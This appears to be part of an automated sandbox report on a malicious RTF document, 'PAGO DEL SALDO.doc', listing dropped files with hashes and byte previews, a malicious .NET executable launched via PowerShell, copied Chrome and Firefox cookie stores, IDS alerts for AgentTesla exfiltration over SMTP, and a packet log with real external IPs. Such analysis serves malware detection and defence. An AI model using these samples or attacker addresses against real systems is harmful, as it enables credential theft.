                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35BY7DRSER1V8J9JMCO9.temp
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS0OLG9QFDF935YIQMNF.temp
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X87RSB2KVTP8BHZRK5J6.temp
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.577982850348611
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
                                                                                                                      MD5:CC5B6CD494E7B4C933950965B9E74783
                                                                                                                      SHA1:693DBBE7323DA069AC852AC2E888D8D11EA55D39
                                                                                                                      SHA-256:42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
                                                                                                                      SHA-512:BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.577982850348611
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
                                                                                                                      MD5:CC5B6CD494E7B4C933950965B9E74783
                                                                                                                      SHA1:693DBBE7323DA069AC852AC2E888D8D11EA55D39
                                                                                                                      SHA-256:42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
                                                                                                                      SHA-512:BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\SzfukVRF.exe
                                                                                                                      Process:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):504832
                                                                                                                      Entropy (8bit):7.875034070984988
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
                                                                                                                      MD5:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      SHA1:7BC80E89BBC7C10B974462E748849F9056D20D4A
                                                                                                                      SHA-256:A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                                                                                                                      SHA-512:BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
                                                                                                                      Malicious:true
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                                                                      C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Chrome\Default\Cookies
                                                                                                                      Process:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):0.9650411582864293
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                                                      MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                                                      SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                                                      SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                                                      SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                                                      Malicious:false
                                                                                                                      Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                                                                                                      Process:C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):524288
                                                                                                                      Entropy (8bit):0.08107860342777487
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                                                                                                      MD5:1138F6578C48F43C5597EE203AFF5B27
                                                                                                                      SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                                                                                                      SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                                                                                                      SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                                                                                                      Malicious:false
                                                                                                                      Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\task.exe
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):504832
                                                                                                                      Entropy (8bit):7.875034070984988
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
                                                                                                                      MD5:F65B0793251364C03D06E8E7134FC21B
                                                                                                                      SHA1:7BC80E89BBC7C10B974462E748849F9056D20D4A
                                                                                                                      SHA-256:A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
                                                                                                                      SHA-512:BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
                                                                                                                      Malicious:true
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: MT_1O1_SWIFt.doc, Detection: malicious, Browse
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
                                                                                                                      C:\Users\user\Desktop\~$GO DEL SALDO.doc
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):162
                                                                                                                      Entropy (8bit):2.5038355507075254
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                                      MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                                      SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                                      SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                                      SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                                      Malicious:false
                                                                                                                      Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:Rich Text Format data, unknown version
                                                                                                                      Entropy (8bit):3.6064242155052617
                                                                                                                      TrID:
                                                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                                                      File name:PAGO DEL SALDO.doc
                                                                                                                      File size:393199
                                                                                                                      MD5:1956fa2feaef4b6fcf3e63f51aa26722
                                                                                                                      SHA1:b35003f1c1a874468dbe41370cea443aafb10915
                                                                                                                      SHA256:1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
                                                                                                                      SHA512:d505806bb9c801efc62561f946bc3921b5748eb7773daa024053e571b068ac4c048f4d0bb0fb95f45ba9e378edbad75529135ba1b71865bc84a56e4a498ddc20
                                                                                                                      SSDEEP:1536:ihpDDDDDDDDhtNjWmg5S/CyoMz+rRxyQJNb87hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDDrqYdzFtr5RDAw5wff
                                                                                                                      File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                                                                                                      File Icon

                                                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                      Static RTF Info

                                                                                                                      Objects

                                                                                                                      IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                      0000007DAh2embeddedpackage97612abdtfhgXgeghDp.ScTC:\nsdsTggH\abdtfhgXGeghDp.ScTC:\CbkepaDw\abdtfhghgeghDp.ScTno
                                                                                                                      1000321E3h2embeddedOLE2LInk2560no

                                                                                                                      Network Behavior

                                                                                                                      Snort IDS Alerts

                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                      11/25/21-18:22:17.725078TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49169587192.168.2.22208.91.198.143
                                                                                                                      11/25/21-18:22:27.655558TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49170587192.168.2.22208.91.198.143
                                                                                                                      11/25/21-18:22:40.216431TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49171587192.168.2.22208.91.198.143
                                                                                                                      11/25/21-18:23:08.295905TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49172587192.168.2.22208.91.198.143
                                                                                                                      11/25/21-18:23:17.632468TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49173587192.168.2.22208.91.199.224
                                                                                                                      11/25/21-18:23:23.304316TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49175587192.168.2.22208.91.198.143

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 25, 2021 18:21:19.612586975 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:19.759325981 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:19.759510040 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:19.760103941 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:19.907119036 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:19.907155037 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:19.907169104 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:19.907201052 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:19.907308102 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:19.907555103 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.053627968 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053677082 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053702116 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053728104 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053884983 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.053899050 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053935051 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053958893 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.053961992 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053971052 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.053987026 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.053994894 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.054013014 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.200695992 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.200742960 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.200786114 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.200938940 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.200990915 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.201064110 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203048944 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203085899 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203131914 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203177929 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203200102 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203227997 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203268051 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203460932 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203516006 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203577995 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203618050 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203691006 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203752041 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.203766108 CET8049167173.232.204.89192.168.2.22
                                                                                                                      Nov 25, 2021 18:21:20.203807116 CET4916780192.168.2.22173.232.204.89
                                                                                                                      Nov 25, 2021 18:21:20.204070091 CET8049167173.232.204.89192.168.2.22
